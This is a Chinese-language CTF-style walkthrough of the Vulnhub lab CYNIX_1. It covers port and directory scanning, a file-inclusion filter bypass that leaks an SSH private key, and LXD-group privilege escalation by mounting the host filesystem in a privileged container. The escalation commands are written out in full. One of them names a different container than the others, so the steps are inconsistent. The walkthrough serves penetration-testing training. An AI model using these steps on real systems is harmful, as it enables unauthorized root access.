Vulnhub靶机随笔-CYNIX_1

Vulnhub靶机CYNIX_1详解

攻击机Kali    IP:192.168.3.44

靶机       IP:未知   系统:未知

A.信息收集

扫描靶机存活性 确定IP地址

1.命令:arp-scan -l

扫描靶机开放端口及其服务版本信息

2.命令 nmap -A -p- -sV 靶机IP地址

3.靶机开放两个端口:    80web网站, 6688ssh端口 按照惯例先访问网站搜集信息,同时爆破子目录名

4.网站主目录就是apache的主目录,没有可利用价值

5.网站子目录爆破 dirb和dirsearch常规工具字典都跑不出有用目录,尝试暴力工具gobuster,外加字典/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 万事俱备,爆破!

选项解析:

              -u          目标URL

              -w          字典

              -x           要搜索的文件扩展名

6.得到一个隐藏子目录lavalamp,直接访问

页面就长这样:

7.挨个翻阅点击之后,找到一个可疑点

当问提交之后,上方会多出一个空白处

8.这可不是我画出来的,学过html的同学一眼就能看出这里面暗藏玄机,没学过的同学也没事,看下一张图片

9.中间存在一个按钮,并且可以提交

B.Burpsuit 流量截取

1.首先挂上代理 开启监听 然后重新提交一份表单 将截取到的流量发送到repeater模块

2.在repeater模块下,点击send发送,然后在render加载一下网页,如果加载不出,可以修改一下设置,将下列选项勾选上即可

3.我们copy一下URL,打开开发者模式(F12),在网页瞎点点,果真在先生的头部存在一个按钮,只不过被设置了透明,我们将其显现出来:将框框里的参数改为1.0即可

4.开启监听,随便输入并提交,这里看到参数是file,感觉很有可能存在LIF漏洞

5.好像被过滤掉了,既然他不仁也不能怪我们不义,直接绕过,最简单的当然是上fuzz字典去爆破,我这里是误打误撞,碰到了a就被我绕过了O.o

绕过!

6.得到一个可登录用户ford,还记得靶机开放了另一个端口6688吗,正是ssh端口,开连!

7.上图表示 靶机关闭了密码登录,所以我们或许需要一个私钥

补充一下:私钥一般和公钥在一起,理论上都放在用户的家目录中

那么…你懂的

8.copy上面的私钥,通过私钥进行ssh连接

这里别忘了给私钥赋予合理的权限,不然不让连哈哈

9.获取第一个flag

C. 提权

1.这里就不卖不关子了,一开始我尝试常见的提权姿势我没发现什么可用的地方,可能是我眼神不太好,所以我觉得直接跑工具稳妥  LinEnum.sh

链接:https://github.com/rebootuser/LinEnum

2.把LinEnum.sh的当前目录利用python发布出去,靶机下载LinEnum.sh脚本,赋予执行权限,然后就开跑

我说我眼神不好,没意见吧,了解lxc,lxd,docker容器的,可能会更明白一点

做个简短的补充:

LXD、LXC 和 Docker 是三种不同的容器化技术,它们在实现和使用上有一些区别。

总结来说,LXD是基于LXC的系统级容器管理器,提供了更高级别的接口和管理工具;LXC是Linux内核提供的一种虚拟化技术,允许在单个Linux内核上运行多个隔离的用户空间实例;而Docker是基于LXC的容器化平台,提供了一套简化容器构建、分发和运行的工具和API。

Lxd提权原理:

LXD 是基于 LXC 容器的管理程序,当前用户可操作容器。所以用户可创建一个容器,再用容器挂载宿主机磁盘,最后使用容器权限操作宿主机磁盘内容达到提权效果。

LXD 提权条件: 已经获得 shell  用户属于 lxd 组

3.查看镜像列表

命令:lxc image list

4.按照实际情况来说,需要创建一个特权镜像,但往往会失败,所以这里选择在kali生成镜像,然后复制到靶机上面

先在kali上面下载alpine

命令:git clone GitHub - saghul/lxd-alpine-builder: Build Alpine Linux images for LXD

接着生成镜像,如下:

将图中框框的复制到靶机中

5.导入镜像.并对其重命名为hacker 哈哈明目张胆

命令: lxc image import alpine-v3.19-x86_64-20240507_0744.tar.gz --alias hacker

6.创建容器

命令: lxc init hacker hacker -c security.privileged=true

7.将容器hacker 挂载到/mnt/root下

命令: lxc config device add fromkali fromkali disk source=/ path=/mnt/root recursive=true

8.启动容器hacker!

命令: lxc start hacker

9.与主机交互!

命令: lxc exec hacker /bin/sh

10.豪取flag

但使龙城飞将在

不教胡马度阴山

好了,到这我们的文章真的结束了,有不懂的可以私信我

你们的点赞和关注是我更新的动力,让我们一起努力~~

  • 35
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值